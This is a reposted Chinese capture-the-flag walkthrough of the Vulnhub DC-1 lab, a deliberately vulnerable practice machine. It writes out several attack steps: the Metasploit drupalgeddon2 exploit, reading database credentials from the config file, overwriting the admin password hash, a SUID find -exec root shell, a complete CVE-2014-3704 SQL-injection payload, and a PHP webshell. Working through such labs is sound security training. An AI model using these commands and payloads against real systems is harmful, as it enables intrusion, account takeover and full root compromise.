ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

Vulnhub[DC1]

2022-06-11 21:02:26  阅读:202  来源: 互联网

标签:name exec 192.168 提权 Vulnhub root find DC1


简介

image-20220610145544679

下载

流程

信息收集

主机探活

kali中使用arp-scan进行主机探活

arp-scan --interface eth0 192.168.0.0/24

image-20220610193843240

经过筛选可以知道192.168.0.150 是DC-1的ip

端口扫描

nmap  -p- 192.168.0.150

image-20220610193725650

可以这里开启了22、80、111端口

我们先从80端口入手

image-20220610194026402

这里可以发现用的是DrupalCMS

渗透

Flag1

启动msf,搜索下Drupal可用的EXP

search Drupal

image-20220610200148643

这里我们选用exploit/unix/webapp/drupal_drupalgeddon2

因为他是最新的,而且品质为excellent

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.0.150
show options

image-20220610204625788

run

image-20220610204705275

这样我们就可以成功得到一个会话。

我们用会话返回一个shell

image-20220610204746157

查看目录,获取flag1

image-20220610204820101

Every good CMS needs a config file - and so do you.

翻译:每个好的 CMS 都需要一个配置文件——你也一样。

这里也就是提示说去查看DrupalCMS的配置文件

Flag2

DrupalCMS的默认配置文件为 /var/www/sites/default/settings.php

image-20220610205323892

这里我们获得数据库的账号dbuser和密码R0ck3t

  • flag2
  • Brute force and dictionary attacks aren't the
  • only ways to gain access (and you WILL need access).
  • What can you do with these credentials?

翻译:

  • 蛮力和字典攻击不是
  • 获得访问权限的唯一方法(您将需要访问权限)。
  • 您可以使用这些凭据做什么?

Flag3

这里我们直接连接mysql之后shell会没有反应的

这里我们需要用python转换成标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20220610210110558

连接mysql

image-20220610210225725

常规的mysql查询

image-20220610210444083

image-20220610210512242

这里的密码是经过drupal加密

在scripts的文件夹中有用来算密码的脚本
但是因为靶机的环境原因会报错

image-20220610211346668

但是可以查到

明文:password
密文:$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

直接update更新admin密码

update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';

然后进行登录

image-20220610211727232

经过查看可以发现Flag3

image-20220610211834805

image-20220610211845104

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

翻译:特殊权限将有助于查找密码 - 但您需要 -exec 该命令才能确定如何获取阴影中的内容。

这里提示我们提示用find -exec,想到用suid提权

Flag4

使用find / -name flag*.txt命令,直接来查找flag文件,获取到flag4

image-20220610212236928

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?

翻译:

您可以使用相同的方法在 root 中查找或访问标志吗?
大概。但也许这并不容易。或者也许是?

提权

使用find找下具有root权限的suid

find / -perm -u=s -type f 2>/dev/null

image-20220610212506446

可以看到find是可以用来提权的

我们尝试用find执行命令

# 这里需要注意-name参数填写的文件名,是需要系统真实存在的
find / -name flag4 -exec "whoami" \;

image-20220610212827099

可以发现这使用的root用户权限

那么我们接下来用find提权

find / -name flag4 -exec "/bin/sh" \;

image-20220610213016338

这里可以发现已经是root用户了

image-20220610213214076

这算是预期解了,按照顺序下来的

非预期解

首先用nmap -A --script=vuln 192.168.0.150扫描靶机

开放了80和22端口,并且存在cve-2014-3704

image-20220610214457129

漏洞利用

image-20220610214659869

cve-2014-3704这个漏洞是sql注入,能直接数据库添加用户名和密码
payload

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0%20;update+users+set+name%3d'root'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=a

将上述payload贴进来,发包后,将会创建一个用户名为:root 密码:thanks的账户

image-20220610220213044

成功用新用户登录进去

然后同样的可以找到flag3

flag3提示用find -exec,想到用suid提权

来到modules,开启php filter

image-20220610221813040

新建articel文章,并写入php一句话木马,底下的text format换成PHP code

image-20220610222041396

文章成功发布后,使用蚁剑连接

然后的流程和预期解差不多

也可以根据提示直接提权

标签:name,exec,192.168,提权,Vulnhub,root,find,DC1
来源: https://www.cnblogs.com/just-like-this/p/16366790.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有